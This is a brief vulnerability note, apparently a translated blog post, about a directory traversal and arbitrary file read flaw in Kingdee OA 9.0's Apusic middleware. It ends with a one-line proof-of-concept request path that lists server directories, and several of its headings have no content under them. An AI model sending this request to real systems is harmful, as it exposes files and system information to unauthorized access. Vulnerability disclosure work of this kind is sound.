Kingdee Oa Apusic Application Server Middleware Server_file Directory Traversal Vulnerability
Kingdee Oa Apusic Application Server Middleware Server_file Directory Traversal Vulnerability
Kingdee OA Apusic Application Server (middleware) server_file directory traversal vulnerability
Vulnerability Description
Kingdee OA Apusic application server (middleware) has a vulnerability to read any file. The attacker can obtain file information in the directory through the vulnerability.
Vulnerability Impact
Kingdee OA 9.0 Apusic Application Server (middleware)
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/admin/protected/selector/server_file/files?folder=/
This post is licensed under CC BY 4.0 by the author.